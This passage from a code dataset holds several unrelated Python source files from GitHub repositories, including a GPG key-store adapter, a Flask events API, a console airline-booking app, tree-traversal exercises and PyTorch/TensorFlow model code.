print()\n","repo_name":"cheshirewara/pydbope","sub_path":"dboperation/DBControlClass.py","file_name":"DBControlClass.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72258806453","text":"\"\"\"Define the adapters of the key stores.\"\"\"\n\nimport re\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, List\n\nfrom gnupg import GPG\nfrom pydantic import BaseModel\n\nfrom .exceptions import DecryptionError, EncryptionError, NotFoundError, TooManyError\n\nif TYPE_CHECKING:\n from .model.key import GPGKey\n\n\nclass Key(BaseModel):\n \"\"\"Model the relevant data of a GPG key.\"\"\"\n\n id_: str\n name: str\n email: str\n short_key: str\n\n def match(self, identifier: str) -> bool:\n \"\"\"Check if the identifier matches the current key.\n\n It will check the string against the different key properties.\n \"\"\"\n return any(\n getattr(self, 
attribute) == identifier\n for attribute in [\"id_\", \"name\", \"email\", \"short_key\"]\n )\n\n\nclass KeyStore:\n \"\"\"Define the adapter of the `gpg` key store.\"\"\"\n\n def __init__(self, key_dir: Path, gpg_binary: str = \"/usr/bin/gpg2\") -> None:\n \"\"\"Set the gpg connector.\n\n Args:\n key_dir: Path to the GnuPG home directory where your GPG keys live.\n\n Raises:\n NotFoundError: If the directory doesn't exist\n \"\"\"\n key_dir = key_dir.expanduser()\n if not key_dir.is_dir():\n raise NotFoundError(f\"{key_dir} is not a directory that holds gnupg data.\")\n self.key_dir = key_dir\n self.gpg = GPG(gnupghome=key_dir, gpgbinary=gpg_binary)\n\n def __repr__(self) -> str:\n \"\"\"Return a string that represents the object.\"\"\"\n return f\"KeyStore(key_dir={self.key_dir})\"\n\n def decrypt(self, path: Path) -> str:\n \"\"\"Decrypt the contents of a file.\n\n Args:\n path: Path to the file to decrypt.\n\n Raises:\n NotFoundError: if file doesn't exist\n DecryptError: can't decrypt file\n \"\"\"\n try:\n result = self.gpg.decrypt_file(str(path))\n except ValueError as error:\n raise NotFoundError(\n f\"Could not find the file to decrypt in {path}\"\n ) from error\n\n if result.returncode != 0:\n # E1101: Instance of 'Crypt' has no 'stderr' member. But it does\n raise DecryptionError(result.stderr) # noqa: E1101\n\n return str(result)\n\n def can_decrypt(self, path: Path) -> bool:\n \"\"\"Test if the user can decrypt a file.\n\n Args:\n path: Path to the file to decrypt.\n \"\"\"\n try:\n self.decrypt(path)\n except (NotFoundError, DecryptionError):\n return False\n return True\n\n def encrypt(self, path: Path, keys: List[\"GPGKey\"]) -> None:\n \"\"\"Encrypt a file for a list of keys.\n\n Args:\n path: Path to the file to encrypt.\n keys: GPG keys used to encrypt the file.\n\n Raise:\n EncryptionError: if there is any problem when encrypting the file.\n \"\"\"\n encrypted_data = self.gpg.encrypt_file(str(path), keys)\n if encrypted_data.ok:\n path.write_bytes(encrypted_data.data)\n else:\n # E1101 Instance of 'Crypt' has no 'stderr' member (no-member). But it does\n raise EncryptionError(encrypted_data.stderr) # noqa: E1101\n\n def reencrypt(self, path: Path, keys: List[\"GPGKey\"]) -> None:\n \"\"\"Reencrypt a file for a list of keys.\n\n Args:\n path: Path to the file to reencrypt.\n keys: GPG keys used to encrypt the file.\n\n Raise:\n EncryptionError: if there is any problem when encrypting the file.\n \"\"\"\n data = self.decrypt(path)\n encrypted_data = self.gpg.encrypt(data, keys)\n if encrypted_data.ok:\n path.write_bytes(encrypted_data.data)\n else:\n # E1101 Instance of 'Crypt' has no 'stderr' member (no-member). 
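For context, a small python-gnupg round trip using the same encrypt/decrypt calls as the KeyStore above. The home directory and recipient fingerprint are placeholders, and decryption assumes the matching private key is in the keyring:

import os
import gnupg

gpg = gnupg.GPG(gnupghome=os.path.expanduser('~/.gnupg'))
recipients = ['0123456789ABCDEF0123456789ABCDEF01234567']  # placeholder fingerprint

encrypted = gpg.encrypt('secret text', recipients)
if not encrypted.ok:
    raise RuntimeError(encrypted.stderr)  # e.g. no such key in the keyring

decrypted = gpg.decrypt(str(encrypted))
assert str(decrypted) == 'secret text'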
But it does\n raise EncryptionError(encrypted_data.stderr) # noqa: E1101\n\n def list_recipients(self, path: Path) -> List[\"GPGKey\"]:\n \"\"\"List the keys that can decrypt a file.\n\n Args:\n path: Path to the file to check.\n \"\"\"\n keys = []\n for short_key in self.gpg.get_recipients_file(str(path)):\n try:\n keys.append(self.gpg.list_keys(keys=[short_key])[0][\"fingerprint\"])\n except IndexError as error:\n raise NotFoundError(\n f\"Could not find gpg key with id {short_key}\"\n ) from error\n\n return keys\n\n @property\n def private_key_fingerprints(self) -> List[str]:\n \"\"\"Return the IDs of the private keys.\"\"\"\n return [key[\"fingerprint\"] for key in self.gpg.list_keys(True)]\n\n @property\n def public_key_fingerprints(self) -> List[Key]:\n \"\"\"Return the IDs of the public keys.\n\n It will only use the first id that it finds.\n \"\"\"\n keys = []\n for key in self.gpg.list_keys():\n match = re.match(r\"(?P.*) <(?P.*)>\", key[\"uids\"][0])\n if match is None:\n raise ValueError(\n \"Could not extract the name or email from the gpg key information\"\n )\n keys.append(\n Key(\n id_=key[\"fingerprint\"],\n name=match[\"name\"],\n email=match[\"email\"],\n short_key=key[\"keyid\"],\n )\n )\n\n return keys\n\n def find_key(self, identifier: str) -> Key:\n \"\"\"Return the key that matches the identifier.\n\n Args:\n identifier: GPG key name, email or fingerprint\n\n Raises:\n NotFoundError: If the identifier doesn't match any available public keys.\n TooManyError: If more than one available public key match the identifier.\n \"\"\"\n keys = []\n for key in self.public_key_fingerprints:\n if key.match(identifier):\n keys.append(key)\n\n if len(keys) == 1:\n return keys[0]\n if len(keys) == 0:\n raise NotFoundError(f\"No key found for {identifier}\")\n raise TooManyError(f\"More than one key matched the identifier {identifier}\")\n","repo_name":"lyz-code/pass-collaborate","sub_path":"src/pass_collaborate/adapters.py","file_name":"adapters.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"37916273917","text":"#!/usr/bin/env python\n\n\"\"\"\nsuanpan\n\"\"\"\nimport os\n\nfrom setuptools import find_packages, setup\n\n\ndef read_file(path):\n with open(path, \"r\") as f:\n return f.read()\n\n\nREADME = \"README.md\"\npackages = find_packages()\n\nsetup(\n name=\"lostc\",\n version=\"0.1.0\",\n packages=packages,\n license=\"See License\",\n author=\"majik\",\n author_email=\"me@yamajik.com\",\n description=read_file(README),\n long_description=__doc__,\n zip_safe=False,\n include_package_data=True,\n platforms=\"any\",\n classifiers=[\n \"Environment :: Web Environment\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Topic :: Internet :: WWW/HTTP :: Dynamic Content\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n)\n","repo_name":"yamajik/lostc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5632155616","text":"\"\"\"\n13 (노드의 개수)\n1 2 1 3 2 4 3 5 3 6 4 7 5 8 5 9 6 10 6 11 7 12 11 13\n\"\"\"\n\"\"\"\n트리 순회\n:트리 순회는 root 노드를 기준으로 생각하면 쉽습니다.\n\"\"\"\n#1. 
전위 순회 (preorder)\ndef preorder(node):\n \"\"\"\n 전위순회를 하는 함수입니다.\n root => 왼쪽 서브트리의 root => 오른쪽 서브트리의 root\n :param node: 노드의 번호입니다. 현재 방문하는 노드입니다.\n :return: 없습니다.\n \"\"\"\n if node:\n #1. root 방문\n print(node)\n #2. 왼쪽 방문\n preorder(tree[node][0])\n #3. 오른쪽 방문\n preorder(tree[node][1])\n\n#2. 중위 순회 (inorder)\ndef inorder(node):\n \"\"\"\n 중위 순회 함수입니다.\n 왼쪽 서브트리의 root => root => 오른쪽 서브트리의 root\n :param node: 현재 방문하는 노드입니다.\n :return: 없습니다.\n \"\"\"\n if node:\n inorder(tree[node][0])\n print(node) #현재노드 방문\n inorder(tree[node][1])\n#3. 후위 순회 (postorder)\ndef postorder(node):\n \"\"\"\n 후위 순회 함수입니다.\n 왼쪽 서브트리의 root => 오른쪽 서브트리의 root => root\n :param node: 현재 방문하는 노드입니다.\n :return: 없습니다.\n \"\"\"\n if node:\n postorder(tree[node][0])\n postorder(tree[node][1])\n print(node)\n\n\n\nV = int(input())\nedges = list(map(int, input().split()))\n\ntree = [[0 for _ in range(3)] for _ in range(V+1)]\n\n\n#2칸씩 건너 뛰면서 입력값 반복\nfor i in range(0, len(edges)-1, 2):\n parent_node = edges[i] #부모 노드 (현재 노드)\n child_node = edges[i+1] #자식 노드\n\n #만약 왼쪽 자식이 비어있으면 넣고\n if tree[parent_node][0] == 0:\n tree[parent_node][0] = child_node\n\n #그렇지 않으면 오른쪽 자식에 삽입\n else:\n tree[parent_node][1] = child_node\n\n #자식 노드의 부모 설정\n tree[child_node][2] = parent_node\n\n#tree 출력\nfor i in range(V+1):\n print(tree[i])\n\nprint('=== 전위 순회===')\nstart_node = 1\npreorder(start_node)\nprint('=== 전위 순회 끝===')\n\nprint('=== 중위 순회 ===')\ninorder(start_node)\nprint('=== 중위 순회 끝 ===')\n\nprint(' === 후위 순회 ===')\npostorder(start_node)\nprint('=== 후위 순회 끝 ===')","repo_name":"Haru-arp/TIL","sub_path":"Algorithm/알고리즘 연습/Tree.py","file_name":"Tree.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40336160434","text":"import autograd\nimport autograd.core\nimport autograd.numpy as np\nfrom neural_structural_optimization import topo_api\nimport tensorflow as tf\n\n# requires tensorflow 2.0\n\nlayers = tf.keras.layers\n\n\ndef batched_topo_loss(params, envs):\n losses = [env.objective(params[i], volume_contraint=True)\n for i, env in enumerate(envs)]\n return np.stack(losses)\n\n\ndef convert_autograd_to_tensorflow(func):\n @tf.custom_gradient\n def wrapper(x):\n vjp, ans = autograd.core.make_vjp(func, x.numpy())\n return ans, vjp\n return wrapper\n\n\ndef set_random_seed(seed):\n if seed is not None:\n np.random.seed(seed)\n tf.random.set_seed(seed)\n\n\nclass Model(tf.keras.Model):\n\n def __init__(self, seed=None, args=None):\n super().__init__()\n set_random_seed(seed)\n self.seed = seed\n self.env = topo_api.Environment(args)\n\n def loss(self, logits):\n # for our neural network, we use float32, but we use float64 for the physics\n # to avoid any chance of overflow.\n # add 0.0 to work-around bug in grad of tf.cast on NumPy arrays\n logits = 0.0 + tf.cast(logits, tf.float64)\n f = lambda x: batched_topo_loss(x, [self.env])\n losses = convert_autograd_to_tensorflow(f)(logits)\n return tf.reduce_mean(losses)\n\n\nclass PixelModel(Model):\n\n def __init__(self, seed=None, args=None):\n super().__init__(seed, args)\n shape = (1, self.env.args['nely'], self.env.args['nelx'])\n z_init = np.broadcast_to(args['volfrac'] * args['mask'], shape)\n self.z = tf.Variable(z_init, trainable=True)\n\n def call(self, inputs=None):\n return self.z\n\n\ndef global_normalization(inputs, epsilon=1e-6):\n mean, variance = tf.nn.moments(inputs, axes=list(range(len(inputs.shape))))\n net = inputs\n net -= mean\n net *= tf.math.rsqrt(variance + epsilon)\n 
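A usage sketch for the convert_autograd_to_tensorflow bridge defined above (repeated here so the snippet is self-contained): it lets a TF 2.x GradientTape backpropagate through an autograd-differentiable NumPy function. The quadratic loss is an illustrative stand-in for the topology objective:

import autograd.core
import autograd.numpy as anp
import tensorflow as tf

def convert_autograd_to_tensorflow(func):
    @tf.custom_gradient
    def wrapper(x):
        # make_vjp evaluates func at x and returns a vector-Jacobian
        # product that tf.custom_gradient uses as the backward pass.
        vjp, ans = autograd.core.make_vjp(func, x.numpy())
        return ans, vjp
    return wrapper

f = convert_autograd_to_tensorflow(lambda x: anp.sum(x ** 2))
x = tf.constant([1.0, 2.0, 3.0])
with tf.GradientTape() as tape:
    tape.watch(x)
    y = f(x)
print(tape.gradient(y, x))  # expect [2., 4., 6.]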
return net\n\n\ndef UpSampling2D(factor):\n return layers.UpSampling2D((factor, factor), interpolation='bilinear')\n\n\ndef Conv2D(filters, kernel_size, **kwargs):\n return layers.Conv2D(filters, kernel_size, padding='same', **kwargs)\n\n\nclass AddOffset(layers.Layer):\n\n def __init__(self, scale=1):\n super().__init__()\n self.scale = scale\n\n def build(self, input_shape):\n self.bias = self.add_weight(\n shape=input_shape, initializer='zeros', trainable=True, name='bias')\n\n def call(self, inputs):\n return inputs + self.scale * self.bias\n\n\nclass CNNModel(Model):\n\n def __init__(\n self,\n seed=0,\n args=None,\n latent_size=128,\n dense_channels=32,\n resizes=(1, 2, 2, 2, 1),\n conv_filters=(128, 64, 32, 16, 1),\n offset_scale=10,\n kernel_size=(5, 5),\n latent_scale=1.0,\n dense_init_scale=1.0,\n activation=tf.nn.tanh,\n conv_initializer=tf.initializers.VarianceScaling,\n normalization=global_normalization,\n ):\n super().__init__(seed, args)\n\n if len(resizes) != len(conv_filters):\n raise ValueError('resizes and filters must be same size')\n\n activation = layers.Activation(activation)\n\n total_resize = int(np.prod(resizes))\n h = self.env.args['nely'] // total_resize\n w = self.env.args['nelx'] // total_resize\n\n net = inputs = layers.Input((latent_size,), batch_size=1)\n filters = h * w * dense_channels\n dense_initializer = tf.initializers.orthogonal(\n dense_init_scale * np.sqrt(max(filters / latent_size, 1)))\n net = layers.Dense(filters, kernel_initializer=dense_initializer)(net)\n net = layers.Reshape([h, w, dense_channels])(net)\n\n for resize, filters in zip(resizes, conv_filters):\n net = activation(net)\n net = UpSampling2D(resize)(net)\n net = normalization(net)\n net = Conv2D(\n filters, kernel_size, kernel_initializer=conv_initializer)(net)\n if offset_scale != 0:\n net = AddOffset(offset_scale)(net)\n\n outputs = tf.squeeze(net, axis=[-1])\n\n self.core_model = tf.keras.Model(inputs=inputs, outputs=outputs)\n\n latent_initializer = tf.initializers.RandomNormal(stddev=latent_scale)\n self.z = self.add_weight(\n shape=inputs.shape, initializer=latent_initializer, name='z')\n\n def call(self, inputs=None):\n return self.core_model(self.z)\n","repo_name":"google-research/neural-structural-optimization","sub_path":"neural_structural_optimization/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"21"} +{"seq_id":"3146350740","text":"import os\nfrom typing import Dict\n\ndef get_filename_without_ext(file_name: str) -> str:\n return os.path.splitext(file_name)[0]\n\ndef get_ext(file_name: str) -> str:\n return os.path.splitext(file_name)[1][1:]\n\n\ndef validate_path(directory: str, file_name: str, file_extension: str) -> Dict[str, str]:\n validate = dict()\n if not isinstance(directory, str) or not isinstance(file_name, str):\n validate.update([\n (\"error\", f'Unexpected directory or file name. Both must be string. | directory: {directory}, file: {file_name}'),\n ])\n return validate\n\n if not os.path.exists(directory):\n validate.update([\n (\"error\", f'Directory does not exist. | directory: {directory}')\n ])\n\n if not file_name.endswith(file_extension):\n file_name = f'{file_name}.{file_extension}'\n \n file_path = os.path.join(directory, file_name)\n\n if not os.path.exists(file_path):\n validate.update([\n (\"warn\", f'Path does not exist. 
| path: {file_path}'),\n ])\n\n validate.update([\n (\"path\", file_path),\n ])\n\n return validate","repo_name":"vshige/blender_model_processing_tool","sub_path":"scripts/utils/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"276319978","text":"def gen(n):\r\n a,b = 1,1\r\n for i in range(n):\r\n yield a\r\n a,b = b,a + b\r\nn=int(input(\"вед колю чисел ф. : \"))\r\ny=list(gen(n))\r\nprint(y)\r\n\r\n\r\n#числа фибоначчи\r\n","repo_name":"Dana123098/-2","sub_path":"Lesson22 generazua funkzu/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9161236643","text":"#!/bin/env python\nimport click\ndef read_size(filesize):\n Size={}\n with open(filesize,'r') as file_size:\n for line in file_size:\n Line=line.strip().split()\n id=Line[0]\n size=Line[1]\n if id not in Size:\n Size[id]=size\n else:\n Size[id]=max(size,Size[id])\n return Size\n\ndef read_huiwen(filehuiwen):\n Huiwen={}\n with open(filehuiwen,'r') as file_huiwen:\n for line in file_huiwen:\n Line=line.strip().split()\n id=Line[0]\n length=int(Line[2])-int(Line[1])+1\n if id not in Huiwen:\n Huiwen[id]=0\n Huiwen[id]=Huiwen[id]+length\n return Huiwen\n\n@click.command()\n@click.option('--filesize')\n@click.option('--filepattern')\n@click.option('--filehuiwen')\n@click.option('--fileout')\n\ndef main(filesize,filepattern,filehuiwen,fileout):\n file_out=open(fileout,'w')\n Size=read_size(filesize)\n Huiwen=read_huiwen(filehuiwen)\n with open(filepattern,'r') as file_pattern:\n for line in file_pattern:\n Line=line.strip().split()\n id=Line[0]\n if id in Size:\n size=Size[id]\n else:\n size=0\n if id in Huiwen:\n huiwen_length=Huiwen[id]\n else:\n huiwen_length=0\n out_line=line.strip()+'\\t'+str(size)+'\\t'+str(huiwen_length)+'\\n'\n file_out.write(out_line)\n\nif __name__=='__main__':\n main()\n\n\n","repo_name":"YinYuan-001/muntjac_code","sub_path":"Fusion_mechanism_analysis/nanopre_reads_analysis/scripts/stat_huiwen.py","file_name":"stat_huiwen.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"24016807","text":"from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n\nevents = [\n {\n \"id\": 1,\n \"uid\": 18,\n \"name\": \"Event 1\",\n \"tagline\": \"Tagline for Event 1\",\n \"schedule\": \"2023-05-20T10:00:00Z\",\n \"description\": \"Description for Event 1\",\n \"moderator\": \"John Doe\",\n \"category\": \"Category 1\",\n \"sub_category\": \"Subcategory 1\",\n \"rigor_rank\": 5,\n \"attendees\": []\n }\n\n]\n\n\n# GET /api/v3/app/events?id=:event_id\n@app.route('/api/v3/app/events', methods=['GET'])\ndef get_event_by_id():\n event_id = request.args.get('id')\n event = next((e for e in events if e['id'] == int(event_id)), None)\n\n if event:\n return jsonify(event)\n else:\n return jsonify({'error': 'Event not found'}), 404\n\n\n# GET /api/v3/app/events?type=latest&limit=5&page=1\n@app.route('/api/v3/app/events', methods=['GET'])\ndef get_latest_events():\n event_type = request.args.get('type')\n limit = int(request.args.get('limit', 5))\n page = int(request.args.get('page', 1))\n\n\n\n # Paginate results\n start_index = (page - 1) * limit\n end_index = page * limit\n paginated_events = events[start_index:end_index]\n\n return 
jsonify(paginated_events)\n\n\n# POST /api/v3/app/events\n@app.route('/api/v3/app/events', methods=['POST'])\ndef create_event():\n event_data = request.json\n new_event_id = len(events) + 1\n new_event = {\n \"id\": new_event_id,\n **event_data,\n \"attendees\": []\n }\n\n events.append(new_event)\n return jsonify({\"id\": new_event_id})\n\n\n# PUT /api/v3/app/events/:id\n@app.route('/api/v3/app/events/', methods=['PUT'])\ndef update_event(event_id):\n event_data = request.json\n\n event_index = next((i for i, e in enumerate(events) if e['id'] == event_id), None)\n if event_index is not None:\n events[event_index] = {\"id\": event_id, **event_data}\n return jsonify({\"message\": \"Event updated successfully\"})\n else:\n return jsonify({'error': 'Event not found'}), 404\n\n\n# DELETE /api/v3/app/events/:id\n@app.route('/api/v3/app/events/', methods=['DELETE'])\ndef delete_event(event_id):\n event_index = next((i for i, e in enumerate(events) if e['id'] == event_id), None)\n if event_index is not None:\n events.pop(event_index)\n return jsonify({\"message\": \"Event deleted successfully\"})\n else:\n return jsonify({'error': 'Event not found'}), 404\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"RESHMAWAGHMARE/Flask-Api","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10600803417","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 12 21:40:36 2020\n\n@author: Shivani\n\"\"\"\nimport datetime\nimport Customer, Flight, Booking\n\n\nlistuser=[]\nlistflight=[]\nlistbooking=[]\n \nwhile(True):\n print(\"1. Add a flight\")\n print(\"2. List all flights\")\n print(\"3. List a flight bookings\")\n print(\"4. Add a Customer\")\n print(\"5. Display all the Customer\")\n print(\"6. Book a flight\")\n print(\"7. Cancel a Booking\")\n print(\"8. List flights booked by the user\")\n print(\"9. List all bookings \")\n print(\"10. Exit\")\n option=input(\"Enter your choice : \")\n\n########################################################## \n \n if(option=='1'):\n print(\"\\n Add flight \\n \")\n num=input(\"1. Enter flight number : \")\n f = input(\"2. Enter source : \")\n t = input(\"3. Enter Destination : \")\n date_entry = input('4. Enter a date in YYYY-MM-DD format : ')\n year, month, day = map(int, date_entry.split('-'))\n d = datetime.date(year, month, day)\n q = input(\"5. Enter Quota : \")\n \n obj=Flight.Flight(num, f, t, d, q)\n listflight.append(obj)\n print(\"\\n Added flight! 
\\n\")\n \n###########################################################\n \n elif(option=='2'):\n print(\"\\n All flight details \\n \")\n for obj in listflight:\n obj.display()\n print(\"\\n\")\n \n###########################################################\n \n elif(option=='3'):\n print(\"\\n All flight booking \\n \")\n fno=input(\"Enter flight number you want to view bookings for : \")\n for obj in listbooking:\n bookinfo=obj.retbook()\n print(bookinfo[3])\n if(bookinfo[3]==fno):\n obj.display()\n \n###########################################################\n \n elif(option=='4'):\n print(\"\\n Add Customer \\n \")\n name= input(\"Enter name : \")\n age = int(input(\"Enter age : \"))\n obj=Customer.Customer(name, age)\n listuser.append(obj) \n print(\"\\nCustomer Added !!\",obj.retcusinfo()[0], \"is the customerID \\n\")\n \n###########################################################\n \n elif(option=='5'):\n print(\"\\n All Customer details \\n \")\n for obj in listuser:\n obj.display()\n print(\"\\n\")\n \n###########################################################\n \n elif(option=='6'):\n \n print(\"\\n Book a flight \\n\")\n id = int(input(\"Enter id : \"))\n flag=True\n for obj in listuser:\n custinfo=obj.retcusinfo()\n print(custinfo[0])\n if(custinfo[0]==id):\n flag=False\n break\n if(flag):\n print(\"Customer doesn't exist, Please add the customer first \\n\")\n else:\n fr = input(\"Enter Source : \")\n to = input(\"Enter Destination : \")\n for obj in listflight:\n flightinfo=obj.retinfo()\n source, destination = [flightinfo[i] for i in (1, 2)]\n if(fr==source and to==destination):\n obj.display()\n fno=input(\"Enter Flight number you want to book : \")\n \n for obj in listflight:\n flightno=obj.retinfo()[0]\n if(fno==flightno):\n break\n \n objbook=Booking.Booking(custinfo, flightinfo)\n listbooking.append(objbook)\n print(\"\\n Booked!! \\n\")\n objbook.display()\n \n###########################################################\n \n elif(option=='7'):\n print(\"\\n Cancel a booking \\n\")\n id=int(input(\"Enter id: \"))\n fno = input(\"Enter flight number you want to cancel : \")\n for obj in listbooking:\n bookinfo=obj.retbook()\n print(bookinfo[0], bookinfo[3])\n if(id==bookinfo[0] and fno==bookinfo[3]):\n listbooking.remove(obj)\n print(\"\\n Cancelled \\n\")\n \n###########################################################\n \n elif(option=='8'):\n print(\"\\n Flights booked by the Customer \\n\")\n id=int(input(\"Enter id: \"))\n for obj in listbooking:\n bookinfo=obj.retbook()\n if(id== bookinfo[0]):\n obj.display()\n \n##########################################################\n \n elif(option=='9'):\n for obj in listbooking:\n \n obj.display()\n \n###########################################################\n \n elif(option=='10'):\n break\n \n###########################################################\n \n else:\n print(\"\\n Invalid input !! 
\\n\")","repo_name":"human-doodle/Airline-Management-Application","sub_path":"AirlineMgmtApp.py","file_name":"AirlineMgmtApp.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"14335190625","text":"import torch\nfrom torch import nn\n\nfrom typing import Optional\n\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, direction_input_dim: int, conditioning_input_dim: int, latent_dim: int, num_heads: int):\n \"\"\"\n Multi-Head Attention module.\n\n Args:\n direction_input_dim (int): The input dimension of the directional input.\n conditioning_input_dim (int): The input dimension of the conditioning input.\n latent_dim (int): The latent dimension of the module.\n num_heads (int): The number of heads to use in the attention mechanism.\n \"\"\"\n super().__init__()\n assert latent_dim % num_heads == 0, \"latent_dim must be divisible by num_heads\"\n self.num_heads = num_heads\n self.head_dim = latent_dim // num_heads\n self.scale = self.head_dim**-0.5\n\n self.query = nn.Linear(direction_input_dim, latent_dim)\n self.key = nn.Linear(conditioning_input_dim, latent_dim)\n self.value = nn.Linear(conditioning_input_dim, latent_dim)\n self.fc_out = nn.Linear(latent_dim, latent_dim)\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass of the Multi-Head Attention module.\n\n Args:\n query (torch.Tensor): The directional input tensor.\n key (torch.Tensor): The conditioning input tensor for the keys.\n value (torch.Tensor): The conditioning input tensor for the values.\n\n Returns:\n torch.Tensor: The output tensor of the Multi-Head Attention module.\n \"\"\"\n batch_size = query.size(0)\n\n Q = self.query(query).view(batch_size, -1, self.num_heads, self.head_dim).transpose(1, 2)\n K = self.key(key).view(batch_size, -1, self.num_heads, self.head_dim).transpose(1, 2)\n V = self.value(value).view(batch_size, -1, self.num_heads, self.head_dim).transpose(1, 2)\n\n attention = torch.einsum(\"bnqk,bnkh->bnqh\", [Q, K.transpose(-2, -1)]) * self.scale\n attention = torch.softmax(attention, dim=-1)\n\n out = torch.einsum(\"bnqh,bnhv->bnqv\", [attention, V])\n out = out.transpose(1, 2).contiguous().view(batch_size, -1, self.num_heads * self.head_dim)\n\n out = self.fc_out(out).squeeze(1)\n return out\n\n\nclass AttentionLayer(nn.Module):\n def __init__(self, direction_input_dim: int, conditioning_input_dim: int, latent_dim: int, num_heads: int):\n \"\"\"\n Attention Layer module.\n\n Args:\n direction_input_dim (int): The input dimension of the directional input.\n conditioning_input_dim (int): The input dimension of the conditioning input.\n latent_dim (int): The latent dimension of the module.\n num_heads (int): The number of heads to use in the attention mechanism.\n \"\"\"\n super().__init__()\n self.mha = MultiHeadAttention(direction_input_dim, conditioning_input_dim, latent_dim, num_heads)\n self.norm1 = nn.LayerNorm(latent_dim)\n self.norm2 = nn.LayerNorm(latent_dim)\n self.fc = nn.Sequential(nn.Linear(latent_dim, latent_dim), nn.ReLU(), nn.Linear(latent_dim, latent_dim))\n\n def forward(self, directional_input: torch.Tensor, conditioning_input: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass of the Attention Layer module.\n\n Args:\n directional_input (torch.Tensor): The directional input tensor.\n conditioning_input (torch.Tensor): The conditioning input tensor.\n\n Returns:\n torch.Tensor: The output tensor of the 
Attention Layer module.\n \"\"\"\n attn_output = self.mha(directional_input, conditioning_input, conditioning_input)\n out1 = self.norm1(attn_output + directional_input)\n fc_output = self.fc(out1)\n out2 = self.norm2(fc_output + out1)\n return out2\n\n\nclass Decoder(nn.Module):\n def __init__(\n self,\n in_dim: int,\n conditioning_input_dim: int,\n hidden_features: int,\n num_heads: int,\n num_layers: int,\n out_activation: Optional[nn.Module],\n ):\n \"\"\"\n Decoder module.\n\n Args:\n in_dim (int): The input dimension of the module.\n conditioning_input_dim (int): The input dimension of the conditioning input.\n hidden_features (int): The number of hidden features in the module.\n num_heads (int): The number of heads to use in the attention mechanism.\n num_layers (int): The number of layers in the module.\n out_activation (nn.Module): The activation function to use on the output tensor.\n \"\"\"\n super().__init__()\n self.residual_projection = nn.Linear(in_dim, hidden_features) # projection for residual connection\n self.layers = nn.ModuleList(\n [\n AttentionLayer(hidden_features, conditioning_input_dim, hidden_features, num_heads)\n for i in range(num_layers)\n ]\n )\n self.fc = nn.Linear(hidden_features, 3) # 3 for RGB\n self.out_activation = out_activation\n\n def forward(self, x: torch.Tensor, conditioning_input: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass of the Decoder module.\n\n Args:\n x (torch.Tensor): The input tensor.\n conditioning_input (torch.Tensor): The conditioning input tensor.\n\n Returns:\n torch.Tensor: The output tensor of the Decoder module.\n \"\"\"\n x = self.residual_projection(x)\n for layer in self.layers:\n x = layer(x, conditioning_input)\n x = self.fc(x)\n if self.out_activation is not None:\n x = self.out_activation(x)\n return x\n","repo_name":"JADGardner/ns_reni","sub_path":"reni/field_components/transformer_decoder.py","file_name":"transformer_decoder.py","file_ext":"py","file_size_in_byte":5760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30409307146","text":"from django import forms\nfrom django.forms import ModelForm, DateInput, CheckboxSelectMultiple\nfrom collegeapp.models import Department,Course,Materials,MyModel,Teacher\n\n\n\nclass Order(forms.ModelForm):\n class Meta:\n model=MyModel\n fields=\"__all__\"\n widgets = {\n 'dob': DateInput(attrs={'type': 'date'}),\n 'materials_provided': CheckboxSelectMultiple(),\n }\n\n def __init__(self, data=None, request=None, *args, **kwargs):\n super(Order, self).__init__(data=data, *args, **kwargs)\n self.request = request\n\n if 'department' in self.data:\n try:\n department_id = int(self.data.get('id_department'))\n self.fields['course'].queryset = Course.objects.filter(department_id=department_id).order_by('name')\n except (ValueError, TypeError):\n pass # invalid input from the client; ignore and fallback to empty City queryset\n elif self.instance.pk:\n self.fields['course'].queryset = self.instance.department.course_set.order_by('name')\n","repo_name":"thajessanty/Demopython","sub_path":"collegeproject/collegeapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17053599717","text":"import csv\nimport numpy as np\nimport math as ma\nimport matplotlib.pyplot as plt\nfrom scipy import integrate\nbirth_data = []\nwith 
